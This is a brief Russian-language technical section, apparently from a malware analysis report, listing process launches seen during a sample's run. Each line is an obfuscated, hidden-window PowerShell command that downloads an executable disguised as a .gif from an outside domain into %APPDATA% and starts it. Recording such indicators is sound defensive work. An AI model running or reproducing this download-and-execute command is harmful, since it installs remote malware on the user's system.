Техническая информация
- '<SYSTEM32>\cmd.exe' /C "PoWErshELL.EXE -ExECUtIOnPoLicY bYpass -NOproFilE -WINDoWStyl HiDDEn (Nw-oBjCT sYsTM.NT.wEBClINT).doWNLoadfiL('http://www.zondopsa.top/rad.php?f=1.gif','%ApPDaTA%.EXE');stArt-pr...
- '<SYSTEM32>\cmd.exe' /C "PoWErshELL.EXE -ExECUtIOnPoLicY bYpass -NOproFilE -WINDoWStyl HiDDEn (Nw-oBjCT sYsTM.NT.wEBClINT).doWNLoadfiL('http://www.zondopsa.top/rad.php?f=1.gif','%ApPDaTA%.EXE');stArt-pr...' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ExECUtIOnPoLicY bYpass -NOproFilE -WINDoWStyl HiDDEn (Nw-oBjCT sYsTM.NT.wEBClINT).doWNLoadfiL('http://www.zondopsa.top/rad.php?f=1.gif','%APPDATA%.EXE');stArt-proCss '%APPDATA%.XE'